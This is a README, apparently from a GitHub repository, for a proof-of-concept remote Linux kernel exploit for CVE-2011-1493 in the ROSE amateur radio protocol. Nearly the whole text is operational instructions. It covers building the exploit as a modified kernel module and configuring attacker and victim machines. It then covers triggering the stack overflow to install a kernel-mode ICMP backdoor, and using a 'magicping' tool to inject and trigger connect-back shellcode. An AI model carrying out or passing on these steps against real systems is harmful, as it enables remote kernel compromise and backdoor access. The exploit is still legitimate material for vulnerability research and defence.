-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathREADME
89 lines (61 loc) · 3.2 KB
/
README
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
********************************
* ROSE remote kernel exploit *
* by Dan Rosenberg (@djrbliss) *
********************************
This is an exploit for CVE-2011-1493, a remote stack overflow in the Linux
implementation of the ROSE amateur radio protocol. THIS IS PROOF OF CONCEPT.
It should work very reliably on the kernel I tested (Ubuntu Server 10.04), but
I make no promises about other kernels. Obviously, any hard-coded addresses
and offsets (in payload.h) must be adjusted for the targeted kernel.
Before running this, you'll need the ax25-tools package and the kernel headers
for the attacker machine's kernel.
The directory structure and instructions are as follows:
module/ The actual exploit, included as a modification to the original
ROSE kernel module. This should be built against the
attack machine's kernel by running:
$ make -C /lib/modules/$(uname -r)/build SUBDIRS=$PWD modules
This will work out of the box on some kernels. If this fails
to compile against your kernel, download the appropriate ROSE
kernel module for your kernel and make the following
modifications:
1. Add an #include "payload.h" in rose_subr.c.
2. Copy-paste the rose_create_facilities() function from the
included module into the new rose_subr.c.
3. Copy the .S assembly files, payload.c, and payload.h into
the new directory.
4. Copy the Makefile into the new directory.
At this point, the module should build against your kernel,
resulting in a rose.ko file.
conf/ Configuration files necessary for setting up a ROSE stack.
Extract server-conf.tar.gz to the root directory of the victim
machine (as root), and extract client-conf.tar.gz to the root
directory of the attacker machine (as root).
scripts/ Scripts to configure and enable the ROSE stacks. Before using
the client script, edit it and replace the path to the ROSE
kernel module with the full path of the recently compiled
exploit module (rose.ko). When you are ready to run the
exploit, run ./rose_server.sh as root on the victim machine,
and ./rose_client.sh as root on the attacker machine.
Next, to run the exploit and install a kernel-mode ICMP backdoor
into the victim machine, run the following:
$ rose_call rose ELITE-1 LOSER-1 6060606060
This will place a ROSE connection from the attacker to the
victim. This connection will hang, so you'll need to ctrl+c
the rose_call command.
icmp/ The code for installing and triggering payloads using the ICMP
backdoor. First, compile magicping.c:
$ gcc magicping.c -o magicping
This tool must be run as root or with CAP_NET_RAW (in order to
open a raw socket for our ICMP packets). One sample payload is
provided: connect.S, a standard connect-back shellcode. Also
included is a calibrate.py script, which will allow you to
easily modify connect.S to point to your IP and port. The
payload can be prepared as follows:
$ as connect.S -o connect.out
$ objcopy -O binary -j .text connect.out connect.o
The payload can then be installed on the remote kernel as
follows:
$ ./magicping -i connect.o [remote ip]
This payload can be triggered by hooking a system call of
choice as follows:
$ ./magicping -t [syscall number] [remote ip]